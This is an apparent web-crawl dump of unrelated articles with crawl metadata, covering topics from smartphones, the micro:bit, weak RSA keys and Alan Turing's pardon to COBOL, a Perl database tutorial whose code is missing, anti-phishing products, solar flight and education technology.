Magic act: To get an idea of just how disruptive smart phones have been, here are a few things they are helping to make disappear: Music players, radios, cameras, video cameras, planners, music and image storage, boarding passes, phone books, rolodexes, instrument tuners, maps, pay phones, calculators, books and, for some users, PCs.
Kevin McCaney is a former editor of Defense Systems and GCN. | <urn:uuid:5eb09dff-33db-4fd2-9b8d-3fee2c867082> | CC-MAIN-2017-09 | https://gcn.com/articles/2013/05/30/gcn30-smartphone-30-years-in-the-making.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171670.52/warc/CC-MAIN-20170219104611-00257-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.94758 | 783 | 3.0625 | 3 |
The BBC, working in collaboration with Lancaster University and Nominet, has managed to turn the micro.bit computer board into a functioning IoT device.
Launched in 2015, the micro.bit is a computer that aims to get young people interested in science, technology, engineering and maths (STEM).
It’s 4cm by 5cm in size, and users are able to connect it up to Arduino and Raspberry Pi coding PCs. There’s also Bluetooth technology on board for connectivity.
But now researchers have found a method for the computers to transmit data packets between each other, which Nominet believes will let children learn how the internet and IoT function.
In order for the tech to be used in schools, it has to be easy-to-use and safe, Nominet has said. Its method would see data transferred between the boards with a special handle, meaning personal data isn’t stored.
As well as this, each child will also be able to access a private friend list, where they’ll be able to find their classmates’ handles. They can then add who they want, safely.
The method works with a Raspberry Pi acting as a gateway for connectivity, and Nominet will provide disk images for each Pi so there isn’t a need for lots of complex code.
When the user is connected, they select their handle through a gateway. It’s transferrable between micro:bits, which means they can use more than one.
Nominet’s IOT tools work as the backend system for the IoT network, with its registry storing data and providing a layer between devices – helping to keep things simple.
You might like to read: Amazon to host Internet of Things competition for start-ups using AWS
Expanding IoT expertise
Adam Leach, Nominet director of research and development, says the organisation is developing this project so that it expands its existing IoT expertise.
He said: “We have built a strong set of tools that enable IoT applications and now we are on a mission to establish other use cases,” he said. “This project with the BBC will really show what our technology can do.”
“We introduced privacy by design by making sure personal data wasn’t part of the system in the first place,” said Leach. “We don’t want the name, password or email address of anybody using a micro:bit.”
Hands-on learning is vital
Simon Shen, CEO of 3D printer brand, XYZprinting, believes it’s vital that when it comes to teaching youngsters tech, they get a hands-on experience.
He told Internet of Business: “Educators have to make sure that youngsters are learning hands-on. With 3D printing, for example, kids get much more out of designing their own 3D model and seeing it being built in front of them than merely being told the mechanics.
“Tech organisations who want to get kids interested in internet technologies should make ‘play’ the centre of their design – using technology that’s fun removes a lot of barriers to learning and adoption. Take robots, for example: designing, assembling and programming a robot engages students across a range of STEAM skills while being fun – a great example of entertainment.”
Major skills shortage
Robert Dragan, CEO of Welsh edtech start-up Learnium, says there’s a major shortage of technical talent in the UK but says products like the micro:bit are doing their bit to solve this problem.
He told Internet of Business: “Let’s look at the big picture. The world is moving towards a digital and creative economy. Yet, the UK has a shortage of technical and scientific talent – the very people that will power the new economy. The future depends on promoting STEM subjects to young people.
“Children are most excited when they can apply creative thinking to the world around them. Using the micro:bit with the IoT promises just that. It’s a great opportunity that hopefully will upgrade the education system.”
You might like to read: Businesses ready to invest in Internet of Things technologies | <urn:uuid:3c567402-62a2-4f2d-ac20-63b5e3da6e9a> | CC-MAIN-2017-09 | https://internetofbusiness.com/bbcs-micro-iot-get-kids-interested-tech/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172017.60/warc/CC-MAIN-20170219104612-00129-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.94417 | 878 | 3.25 | 3 |
Article by Dan Auerbach
Researchers Use EFF's SSL Observatory To Discover Widespread Cryptographic Vulnerabilities
Lenstra's team has discovered tens of thousands of keys that offer effectively no security due to weak random number generation algorithms.
The consequences of these vulnerabilities are extremely serious. In all cases, a weak key would allow an eavesdropper on the network to learn confidential information, such as passwords or the content of messages, exchanged with a vulnerable server.
Secondly, unless servers were configured to use perfect forward secrecy, sophisticated attackers could extract passwords and data from stored copies of previous encrypted sessions.
Thirdly, attackers could use man-in-the-middle or server impersonation attacks to inject malicious data into encrypted sessions. Given the seriousness of these problems, EFF will be working around the clock with the EPFL group to warn the operators of servers that are affected by this vulnerability, and encourage them to switch to new keys as soon as possible.
While we have observed and warned about vulnerabilities due to insufficient randomness in the past, Lenstra's group was able to discover more subtle RNG bugs by searching not only for keys that were unexpectedly shared by multiple certificates, but for prime factors that were unexpectedly shared by multiple publicly visible public keys. This application of the 2,400-year-old Euclidean algorithm turned out to produce spectacular results.
In addition to TLS, the transport layer security mechanism underlying HTTPS, other types of public keys were investigated that did not use EFF's Observatory data set, most notably PGP.
The cryptosystems that underlay the full set of public keys in the study included RSA (which is the most common class of cryptosystem behind TLS), ElGamal (which is the most common class of cryptosystem behind PGP), and several others in smaller quantities.
Within each cryptosystem, various key strengths were also observed and investigated, for instance RSA 2048 bit as well as RSA 1024 bit keys. Beyond shared prime factors, there were other problems discovered with the keys, which all appear to stem from insufficient randomness in generating the keys.
The most prominently affected keys were RSA 1024 bit moduli. This class of keys was deemed by the researchers to be only 99.8% secure, meaning that 2 out of every 1000 of these RSA public keys are insecure. Our first priority is handling this large set of tens of thousands of keys, though the problem is not limited to this set, or even to just HTTPS implementations.
We are very alarmed by this development. In addition to notifying website operators, Certificate Authorities, and browser vendors, we also hope that the full set of RNG bugs that are causing these problems can be quickly found and patched. Ensuring a secure and robust public key infrastructure is vital to the security and privacy of individuals and organizations everywhere.
Cross-posted from Electronic Frontier Foundation | <urn:uuid:e81c5452-5952-473d-9e03-a298fd924730> | CC-MAIN-2017-09 | http://www.infosecisland.com/blogview/20260-Researchers-Discover-Widespread-Cryptographic-Vulnerabilities.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171078.90/warc/CC-MAIN-20170219104611-00601-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.961823 | 582 | 2.78125 | 3 |
Grandfather of computing Alan Turing granted posthumous royal pardon
Dr Alan Turing, the mathematician who helped to crack the Enigma code during the second world war, has been granted a royal pardon 59 years after he took his own life. His crime? Homosexuality. In spite of his role in code cracking -- which is widely regarded as having helped to shorten the war -- he was convicted for engaging in homosexual activity, and underwent experimental chemical castration as "cure" and punishment in 1952. Two years later he killed himself aged just 41.
It was the illegality of homosexuality that meant Turing's relationship with a man led to a criminal record, and this in turn meant that he was no longer permitted to continue his work at GCHQ (Government Communications Headquarters). The UK's justice secretary, Chris Grayling requested the pardon which was then granted under the Royal Prerogative of Mercy. Grayling said:
"Dr Alan Turing was an exceptional man with a brilliant mind. His brilliance was put into practice at Bletchley Park during the second world war, where he was pivotal to breaking the Enigma code, helping to end the war and save thousands of lives. His later life was overshadowed by his conviction for homosexual activity, a sentence we would now consider unjust and discriminatory and which has now been repealed."
The pardon has not come completely out of the blue as there has been a long running campaign to clear Turing's name. Two years ago, former UK Prime Minister Gordon Brown apologized for the "appalling treatment" Turning has received and calls have been made for a pardon for some years. The campaign received the backing of names such as Professor Stephen Hawking and Richard Dawkins. Pardons are usually only granted when it later transpires that someone convicted of a crime is in fact innocent. As Turning engaged in homosexual activity (or "gross indecency" as it was termed), he was, technically speaking, guilty.
While the pardon has been welcomed by many, for others it is not enough. Turing is just one of many people convicted under a law that does not exist anymore. His high-profile work led to a high-profile campaign to clear his name, but it does nothing for the less well-known people convicted of the same "crime". We can thank Turing not only for the work he did during the war, but also for paving the way for modern computing. This is not really the place for debate about the rights and wrongs of a 61 year old conviction, but Richard Dawkins makes good point on Twitter: "Overturn a conviction" sounds a lot better than "pardon". "Pardon" implies that #Turing did something wrong in the first place.
Anyway -- thanks Mr Turing. | <urn:uuid:945e63d6-305f-4546-aac2-b730ba67d928> | CC-MAIN-2017-09 | https://betanews.com/2013/12/24/grandfather-of-computing-alan-turing-granted-posthumous-royal-pardon/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501173866.98/warc/CC-MAIN-20170219104613-00001-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.984998 | 554 | 2.546875 | 3 |
Enterprise Applications: 20 Things You Might Not Know About COBOL (as the Language Turns 50)
The name COBOL was selected during a meeting of the Short Range Committee, the organization responsible for submitting the first version of the language, on Sept. 18, 1959. This committee, formed by a joint effort of industry, major universities and the U.S. government, was known as CODASYL (Conference on Data Systems Languages). CODASYL completed the specifications for COBOL as 1959 ended. These were approved by the Executive Committee in January 1960 and sent to the government printing office, which edited and printed these specifications as Cobol 60. COBOL was developed within a six-month period, and yet is still in use more than 50 years later. | <urn:uuid:6ec3c84b-9092-41bc-9939-5c180aae0801> | CC-MAIN-2017-09 | http://www.eweek.com/c/a/Enterprise-Applications/20-Things-You-Might-Not-Know-About-COBOL-As-the-Language-Turns-50-103943 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171163.39/warc/CC-MAIN-20170219104611-00297-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.975294 | 161 | 2.921875 | 3 |
Scientists working to find the elusive "God particle" say they've discovered "intriguing" signs that it does exist and they are closing in on what could be a basic building block of the universe.
Researchers working at the Large Hadron Collider, the world's largest particle collider located astride the Swiss/French border, were quick to note they have not yet found anything to definitively prove or disprove that the Higgs boson particle exists. However, they think they're close enough to figure it out within a year.
The Higgs boson particle has long been a focus of great scientific speculation. If it does exist, it's thought to account for why everything in the universe has weight. Frequently referred to as the "God particle," it could be a key component of everything from humans to stars and planets, as well as the vast majority of the universe that is invisible.
Scientists hope that finding Higgs boson could help answer many of the great mysteries of the universe. Conversely, without this cornerstone of physics, many of the theories that serve as the underpinnings of human understanding of the universe evaporate.
"We cannot conclude anything at this stage," said Guido Tonelli, an Italian physicist who has been studying the Higgs boson. "We need more study and more data. Given the outstanding performance of the [Large Hadron Collider] this year, we will not need to wait long for enough data and can look forward to resolving this puzzle in 2012."
Part of the difficulty in finding the particle, if it does exist, is that physicists don't have any idea of what mass Higgs boson itself might have. That means they have to look for it through an expansive range of mass possibilities.
Researchers working at the Large Hadron Collider noted in an announcement Tuesday that they now think Higgs boson is more likely to be found in the lower range of the mass spectrum.
"Tantalizing hints have been seen... in this mass region, but these are not yet strong enough to claim a discovery," wrote a spokesman for the European Organization for Nuclear Research (CERN), which runs the Large Hadron Collider.
Scientists working at the Large Hadron Collider, which went online in September of 2008, are on a quest to answer some of the great mysteries of the universe: the existence of Higgs boson, understanding dark matter and black holes, and finding new dimensions.
Smashing the beams together inside the 17-mile underground collider creates showers of new particles that should replicate conditions in the universe just moments after its conception.
Sharon Gaudin covers the Internet and Web 2.0, emerging technologies, and desktop and laptop chips for Computerworld. Follow Sharon on Twitter at @sgaudin, on Google+ or subscribe to Sharon's RSS feed. Her e-mail address is firstname.lastname@example.org.
This story, "Scientists closing in on 'God particle' existence" was originally published by Computerworld. | <urn:uuid:978f62cb-220c-4cb9-9d56-5bd64cbf5fe5> | CC-MAIN-2017-09 | http://www.itworld.com/article/2733135/consumer-tech-science/scientists-closing-in-on--god-particle--existence.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171163.39/warc/CC-MAIN-20170219104611-00297-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.961439 | 615 | 2.765625 | 3 |
Homebrew NMS: Keep a Database of Network Assets
Our previous installment explained how to glean data from SNMP-capable devices using Perl's Net::SNMP module. Now it's time to do something useful: store this data in a database.
Over time, we find it necessary to gather more and more information. An NMS solution may be able to store data in its internal database, but sometimes we need to combine many data sources in a single place. For example, it's extremely useful to grab Layer 2 discovery data and place it into a "host database," which will contain much more information than your discovery application provides. A few top-of-the-head examples are: owner information, serial number, related ticket numbers from your trouble ticketing system, physical location, and much, much more.
We'll get into the details of one proposed database layout in a future article, which will provide more concrete examples of using externally gathered data to enable successful executions of IT processes.
Let's take a look at how data can be manipulated in a database. Using Perl's DBD:Pg module, we can access a PostgreSQL database easily. MySQL will work fine too; this is just an example. There are many aspects to DBD::Pg that aren't covered here, so be sure to read the documentation for further details.
The overall concept of DBD::Pg is best expressed in steps:
- Define database name, host name of the database server, and your username and password
- Connect to the database
- Execute queries: insert new data, retrieve existing data, or delete data
So let's see this in action. The following example connects to a PostgreSQL database and executes a simple "SELECT" query. Here's the connection part:
The above code sets some useful variables, and then crafts the arguments required by the connect() method. The $dbh variable is a handle returned by the database, and if it's undefined or holds a negative value after the connect() call, that means the connection did not succeed.
At this point we simply need to use the handle returned by DBI->connect() to execute queries. First, a database statement must be "prepared." If, for example, you needed to execute the same query over and over, you would execute() the query in a loop, but with different variables each time. A performance enhancement, prepare(), with a question mark placeholder, allows you to avoid sending the entire query over and over. Instead, it will send only the new arguments for every subsequent execute() call. We aren't using substitution in the following example, but you need to be aware of the real purpose of prepare().
The above code should execute the SELECT query it as commanded to run and print the results. It is quite straightforward after reading the DBD::Pg documents, but there are a few things to point out. The $errstr variable is always available, and should be printed if any call to a DBD function fails. This means that you need to check the return value for every function call, obviously. The fetchrow_array object will return an array containing the data returned from the database. It may be wise to check that only one result was returned!
Since @row is an array, it can be accessed by referencing individual indexes, like so: $row. You will know the database schema beforehand, so accessing individual fields inside @row should be easy. If you're going to be using the data frequently during processing, it is recommended that you assign each field in the array some useful variable names.
For the sake of the example, we'll assume that we have new knowledge about a host in our database. The mythical database keeps track of switch, switchport, mac_addr, and "lastseen" (in that order). An easy way to update this information, correcting the switchport information, follows.
When processing data returned from the DB gets more complex, assigning the @row elements meaningful names save a lot of time and frustration. See how strange it gets referring to $row[number]? Referring back to the order of database elements gets quite tedious.
Inserting new data into the database is actually easier; just create some INSERT queries based on whatever data you have available.The difficult part is keeping track of what data types and fields you need to insert into a database row. I find it best to include the output of '\d' in PostgreSQL right in a comment in my source code, and also to name variables based on database fields.
We'll be using the above example to show how easy it is to store, and more importantly, correlate data from multiple sources in a single authoritative database. Before zooming out to the overall IT picture, we'll continue focusing on network-based information in the next article: managing and verifying discovery data. | <urn:uuid:a75e802b-5109-4864-aaa3-d8722b7aa580> | CC-MAIN-2017-09 | http://www.enterprisenetworkingplanet.com/print/netos/article.php/3699296/Homebrew-NMS-Keep-a-Database-of-Network-Assets.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171608.86/warc/CC-MAIN-20170219104611-00473-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.895478 | 997 | 2.890625 | 3 |
- Passwords – Just as someone would use a password to access his/her computer, so too should someone install a password protection system on his/her mobile device. Passwords allow the phone to lock when not in use, preventing sensitive data from being easily compromised.
- System Updates – These are recommended by the manufacturer for a reason – these valuable updates contain patches for vulnerability issues and help further secure data. Always keep devices updated for maximum-security protection.
- Mobile Monitoring Applications – A reliable system helps safeguard data, tracks a stolen or missing phone and fights off mobile threats.
- Links and Files – Always exercise the utmost caution when opening any link or file on a Smartphone. As with any electronic device, never open an attachment from an unfamiliar sender and it is recommended that the user type in the website directly instead of simply following a link, which could result in a phishing attack.
- Exercise Caution on Public Networks – It is advisable to avoid banking and other private related password encryption when on a public Wi-Fi network.
- Install Applications from Trusted Sources – Downloading applications from reputable stores is advisable, especially when compared to an unknown third party.
- Confirm Applications’ Access – For example, some games have direct access to personal data applications. There is no need for this type of information sharing, so regular inspection of data sharing is important for helping minimize security breaches and/or threats.
- Secure VPN – A secure system encrypts data, making it more difficult for thieves to randomly steal information.
As Smartphones are becoming the very epicenter of human lives, they contain an abundance of information, including bank accounts, text messages, contacts, passwords and credit cards. These devices are readily connected constantly, making them more vulnerable to attacks and scams. As many businesses offer Smartphones to their employees, especially those in positions where they are constantly traveling and meeting potential clients, being readily on the move means Smartphone data can be accessed by unwanted, prying eyes. While no method is completely foolproof, as cyber attacks are constantly evolving, there are some measures employees can take to help reduce the likelihood of becoming a victim. | <urn:uuid:58c4f2ab-6930-43c5-abad-2dded5915329> | CC-MAIN-2017-09 | https://jive.com/blog/tips-securing-mobile-data/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174135.70/warc/CC-MAIN-20170219104614-00045-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.927991 | 439 | 2.6875 | 3 |
Block Data Compression
Who chooses block data compression, and why
Anyone with a block-based storage solution can benefit from block data compression. Since compression is managed as a volume attribute, it's easy to enable, configure, and monitor regardless of user expertise.
How block data compression works
Block data compression reduces the size of data on disk, enabling more efficient storage capacity utilization on EMC CLARiiON and EMC Celerra systems. Compression occurs in the background to minimize performance overhead.
Benefits of block data compression
Block data compression frees up valuable storage capacity with minimal performance overhead. In contrast to deduplication, compression applies to all data, resulting in capacity savings of up to 50 percent. | <urn:uuid:277c7e20-cd0f-4593-8d1f-42f31dbed006> | CC-MAIN-2017-09 | https://www.emc.com/corporate/glossary/block-data-compression.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170404.1/warc/CC-MAIN-20170219104610-00465-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.848727 | 149 | 2.78125 | 3 |
Semantic technologies don't refer to a single technology, but rather to a side variety of tools and technologies that have to do with meaning. Some focus on structure, some on text, and some on intelligence. Understanding what sub-categories are out there can help you determine when to use each.
Semantic Web vs. Semantic Technologies—much of the content on this site is about the Semantic Web, but it's only one kind of semantic technology. This lesson outlines the others and how they relate to the Semantic Web.
Semantic Search and the Semantic Web—semantic search is an increasingly hot topic, and with the Google Knowledge Graph it has become intimately related to the Semantic Web.
NLP and the Semantic Web—natural language process and text analytic technologies can be powerfully combined with Semantic Web technologies. | <urn:uuid:8f3c8388-8eb8-4595-ba06-48ae9cdef69c> | CC-MAIN-2017-09 | http://www.cambridgesemantics.com/semantic-university/comparing-semantic-technologies | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171932.64/warc/CC-MAIN-20170219104611-00041-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.910924 | 171 | 2.765625 | 3 |
6. Expecting people to behave like computers
Cause: Software developers expect that computers will follow their instructions exactly. If a computer seems to make a mistake, it’s because the instructions were wrong.
Resulting bad habit: Programmers can forget that humans don’t always follow instructions exactly (or at all), that they don’t always act (or think) logically and that they have things called “feelings.”
Quotes: "When programming, the machine (usually) does your bidding and executes whatever instructions you give to it. This doesn’t work as well with people…." Matt Drozdzynski
"Having to explain what a logical fallacy is, first, everytime someone says something completely wrong gets frustrating fast." SnOrfus
"The mental separation between logic and feeling is profound." Kevin Beckford | <urn:uuid:8db998e9-a2b3-4a47-abe4-e9ded159216a> | CC-MAIN-2017-09 | http://www.cio.com/article/2368848/developer/131287-0-1-2-Go-8-bad-habits-you-can-blame-on-programming.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171932.64/warc/CC-MAIN-20170219104611-00041-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.953666 | 176 | 2.84375 | 3 |
Credit: Martyn Williams
The Solar Impulse plane takes off from Moffett Field in Mountain View, Calif.
A one-of-a-kind aircraft powered solely by solar energy took to the skies above Silicon Valley early Friday morning on the first leg of a planned trip across the U.S.
The aircraft, called Solar Impulse, has the wingspan of a jumbo jet but weighs the same as a small passenger car and can theoretically fly forever.
At a little after 6 a.m., in front of a small crowd of spectators and a row of media cameras, the propellers on the aircraft revved and it began to move along the runway at Moffett Field in Mountain View. Within a few seconds it was airborne, climbing slowly away from its home for the last two months and, the team hopes, into another page of aviation history.
"In terms of today's flight, it's a very big contrast," Bertrand Piccard, pilot of the Solar Impulse, told reporters about an hour before takeoff. "On one side, we have to be very precise, it's an aeronautical first. We have to coordinate with the FAA, with air-traffic control, so there is a hard workload for the pilot. On the other side, it's complete freedom because we have no fuel on board. It's completely solar powered so theoretically the plane can fly forever. We don't need to refuel."
The secret to its light weight is a fuselage made from carbon fiber sheets three times lighter than paper. The solar cells that cover the tops of its expansive wings are thin, at just 135 microns, and it makes incredibly efficient use of the power it generates. Losses in the plane's motors amount to roughly 6 percent, versus around 70 percent in conventional motors, according to the project team.
Solar Impulse has already set several aviation milestones in Europe, including the first ever solar-powered night flight in 2010, the first international solar flight in 2011 and the first intercontinental solar flight in 2012. It also holds five world records, including one for duration: an impressive 26 hours, 10 minutes and 19 seconds.
The journey that began on Friday is scheduled to end in New York sometime in July. The first leg, at pace equivalent to about 70 kilometers per hour, takes it from Moffett Field in Silicon Valley to Phoenix, Arizona, where it is scheduled to land at around 1 a.m. Saturday morning. Further flights will go to Dallas, St. Louis, Washington D.C., and New York.
The trip isn't about speed. After all, it would be quicker to drive to Phoenix than fly in Solar Impulse.
"We're the first airplane to be able to fly day and night on solar power, so it's a fabulous way to promote clean technology, to show what our world could do if we were really applying these technologies everywhere" said Piccard. "We have to understand, the technologies we have on board, if they were used everywhere including on the ground, they could help our world divide by two energy consumption."
Piccard, who previously completed an around-the-world flight in a hot air balloon, is sharing cockpit duty with Andre Borschberg, a former Swiss Air Force pilot and graduate of MIT. The two will be piloting the different legs of the journey between them.
By the numbers, the Solar Impulse has a 63 meter wingspan, is 22 meters long and just over 6 meters high. It weighs 1,600 kilograms and its four engines are powered by batteries that are charged by 11,628 solar cells. Its take off speed is a fairly leisurely 44 kilometers per hour and its cruising altitude is 8,500 meters, or 27,900 feet.
Martyn Williams covers mobile telecoms, Silicon Valley and general technology breaking news for The IDG News Service. Follow Martyn on Twitter at @martyn_williams. Martyn's e-mail address is email@example.com | <urn:uuid:ea0c8824-cdfb-4724-884c-430e962de78f> | CC-MAIN-2017-09 | http://www.networkworld.com/article/2165962/data-center/solar-powered-plane-takes-off-on-flight-across-us.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174154.34/warc/CC-MAIN-20170219104614-00393-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.957176 | 825 | 2.796875 | 3 |
Protect your customers from phishing attacks that impersonate your organization
What Is Consumer Phishing?
In a phishing attack, a criminal sends a large number of consumers a deceptive email appearing to come from a respected brand — typically a financial service provider or an email service provider.
The email uses social engineering techniques to attempt to mislead the recipients to visit a web page appearing to belong to the impersonated brand, where the user will be asked to enter her username and password — and sometimes other information as well. Having stolen this information, the criminal now controls the victim’s account.
A good example of a large scale consumer phishing attack is the recent attack targeting customers of GoDaddy
How Consumer Phishing Works
Most phishing campaigns involve an attacker masquerading as a trusted brand, both in an email sent to the intended victims and using a website looking much like the website of the impersonated brand. The phisher commonly uses email spoofing to assume the identity of the brand he wishes to impersonate. In terms of the email and website content, phishers use copied logos and phrases associated with the brand to look credible.
Most consumers think that phishing is limited to impersonation of financial institutions, but as the black market value of stolen email credentials is going up, attackers are targeting more industries.
Cyber criminals abuse brand trust, using your brand name as a disguise to trick your customers into opening their malicious emails.
Traditional Defenses Identify Bad URLs
Traditional phishing countermeasures are based on rapidly identifying malicious websites — the phishing websites — and then scanning emails for hyperlinks pointing to these pages. To circumvent these countermeasures, phishers use smaller batches of phishing emails, each one of which uses distinct hyperlinks.
Often, legitimate services, such as link shortening services, are used by the phishers to make detection more difficult. The fact that the attacks constantly change makes it difficult for traditional filters to do a good job.
The Solution: Agari Customer Protect
Agari Customer Protect stops phishing attacks by ensuring that every email your customers receive claiming to be from you will actually be from you.
Agari Customer Protect analyzes email sent claiming to be from your domains to 3 billion mailboxes across the world’s largest cloud email providers including Google, Microsoft and Yahoo. Based on that data, Agari creates a model of legitimate email behavior for your organization. Then, that model is published via the DMARC standard and used to block all unauthorized email from reaching your customers’ inboxes. | <urn:uuid:47cea634-bc50-4601-8a9f-845ed93849b6> | CC-MAIN-2017-09 | https://www.agari.com/consumer-phishing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174154.34/warc/CC-MAIN-20170219104614-00393-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.916889 | 518 | 2.609375 | 3 |
UAV missions boost tech presence on border
- By Alice Lipowicz
- Dec 12, 2008
A Predator B unmanned aerial vehicle will begin its first surveillance
flights over the border between the United States and Canada in early
February, U.S. Customs and Border Protection (CBP) officials said.
test flights are part of a plan to link aerial imagery and data with a
network of marine and ground sensors and other technologies along the
border, they added.
Officials said the agency has been flying
UAVs over the border with Mexico since 2005 to augment data collected
by sensors and other technologies. They had announced Predator B
flights over the Canadian border as part of a test program nearly two
years ago, but they only recently completed negotiations with the
Federal Aviation Administration and other entities to obtain the
necessary approvals, Juan Munoz Torres, a CBP spokesman, said Dec. 11.
Predators are capable of flying 260 miles per hour for more than 18
hours at altitudes of 50,000 feet. The new Predator B will operate out
of Grand Forks, N.D., and carry radar, infrared camera, video camera
and communications equipment.
In March, CBP officials said they
were refining a security strategy for the northern border and intended
to demonstrate an integrated air, land and marine solution. Congress
included $20 million for a northern border security demonstration
project in the fiscal 2009 budget.
Alice Lipowicz is a staff writer covering government 2.0, homeland security and other IT policies for Federal Computer Week. | <urn:uuid:6867391a-aee5-46ac-a9fa-543623b07607> | CC-MAIN-2017-09 | https://fcw.com/articles/2008/12/12/uav-missions-boost-tech-presence-on-border.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172649.58/warc/CC-MAIN-20170219104612-00565-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.92395 | 325 | 2.5625 | 3 |
Another part of the world is stepping forward to tackle the electronic waste problem. This time it’s New Delhi in India, which has begun enforcing e-waste management requirements as of the first of May.
The Central Pollution Control Board (“CPCB”) which is a division of The Ministry of Environment and Forests that was formed back in 1974, has issued guidelines that require manufacturers and retailers to accept, free of charge, e-waste from consumers and then re-sell, recycle, or properly dispose of those items.
Specifically, the law labels many types of electronics as hazardous materials, putting them under the Hazardous Waste Management Division (“HWMD”) of the CPCB. Manufacturers are required to submit collection and recycling plans to the HWMD, with most having done so in advance of the rules taking effect at the first of the month. | <urn:uuid:de16385e-4df6-46cf-ac6b-ad124fb53d00> | CC-MAIN-2017-09 | http://anythingit.com/blog/2012/05/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170521.30/warc/CC-MAIN-20170219104610-00509-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.953442 | 185 | 2.53125 | 3 |
How technology can reinvigorate the education system
The path to a global No. 1 ranking in education requires technology
President Barack Obama set a goal of making the United States first in the world in post-secondary academic degrees by 2020, and Jim Shelton says technology is what will get us there.
- By Alice Lipowicz
- Oct 07, 2010
Named assistant deputy secretary for technology at the Education Department’s Office of Innovation and Improvement in April 2009, Shelton is in charge of grant-making and educational technology strategy at the department. He also coordinates Education's technology efforts with other federal and state agencies.
Previously, he was education program director at the Bill and Melinda Gates Foundation, where he spurred investments in next-generation models of learning. He has a bachelor's degree in computer science from Morehouse College and a master's degree in education and master's degree in business administration from Stanford University. He began his career in computer system development and became a senior consultant at McKinsey and Co. He also co-founded an educational company, worked on education reform issues for New York City and launched a private nonprofit venture capital fund for education.
At the recent Gov 2.0 Summit in Washington, Shelton talked about how customized software for instruction is being used to try to reduce the teacher/student ratio to as close to 1-to-1 as possible. With that ratio down to 15-to-1 now — from 27-to-1 in 1970 — he said the United States is unlikely to see more improvements in the classroom without technology.
He also noted that collecting and analyzing massive amounts of data is taking the guesswork out of understanding how students learn and what teaching methods work best. Using adaptive algorithms, we have the ability to personalize education. And the availability of low-cost devices, broadband access and near-universal connectivity are further driving improvements in education.
Shelton recently spoke with reporter Alice Lipowicz about technology, education and the challenges inherent in his position. The interview has been edited for style, clarity and length.
FCW: What’s the role of the Office of Innovation and Improvement?
Shelton: We do a lot of work with demonstration grants for teacher preparedness, charter schools and the investment innovation fund. We want to stimulate the identification of solutions, drive best practices, and support the ecosystem of research and development.
We define innovation as a solution that is significantly better than the status quo. Technology is going to be a driver for educational innovations as we more forward.
FCW: Building on what you said at the Gov 2.0 Summit, what more can you tell us about how technology is being used to improve education?
Shelton: Technology is being used to help students read and learn better, to connect teachers to resources, and as a platform for research.
No. 1, there is an opportunity to use technology as a support for student assessments. We are using that technology to make informed decisions. Kids can take tests or use learning software online that determines where they are in learning. The districts can buy that software.
Second, we want to use technology to make it easier for teachers to connect to peers and experts. You see how easy it is for students to connect. It should be easy for teachers to go online to meet their needs.
Right now, there is no good technology to help teachers and students personalize instruction. Some of the platforms will be free; others will be provided by states and school districts.
The Gov 2.0 Summit was a great opportunity to hear about the interesting work going on at government agencies and see the available solutions and tools. Some of the Web 2.0 developers have not thought about applying their tools to education yet.
FCW: What can you tell us about the department’s National Education Technology Plan?
Shelton: It’s a federal strategy not only for the department but for the country. It is a blueprint. As for implementing it, part of the responsibility is under my office. We coordinate the IT aspects.
A lot of our work is about coordination and understanding the vision. We work with the White House Office of Science and Technology Policy, Federal Communications Commission, and also with the National Science Foundation and the Defense Department. Technology is deeply embedded in what we do.
We work with the FCC on the E-Rate program, [which funds school and library broadband access through the Universal Service fee charged to companies that provide telecommunications services]. We work on education technology related to the communities, on [science, technology, engineering and math] education programs and professional development.
The question is: How quickly will states and districts move to IT solutions for their problems? What are the top-priority solutions?
Some of this is already happening. California has a network of teachers sharing information. Through technology, students will continue at home and organizations can keep track of performance.
A number of communities have embraced the one-to-one computing idea — one laptop per student — including communities in Maine, Vermont and Virginia. Some folks are pushing the envelope with work on devices and phones. Houghton Mifflin is trying out a large pilot project for teaching with iPads.
FCW: What are the greatest challenges of your position?
Shelton: The hardest part is getting people to take a risk from the current way to the future. They can see the benefits, but they get nervous about making a change. I wind up talking to a lot of folks, both on the demand side with states and school districts and with vendors on the supply side.
We are in an environment where we have to do more and be more efficient. Money is tight and will get tighter.
Technology has turned out to be a way to help with the problem. We can do it in education.
The risks are that if you try something very difficult, it might not work. People are becoming risk-averse.… There needs to be a form of accountability so that people are not penalized for taking risks.
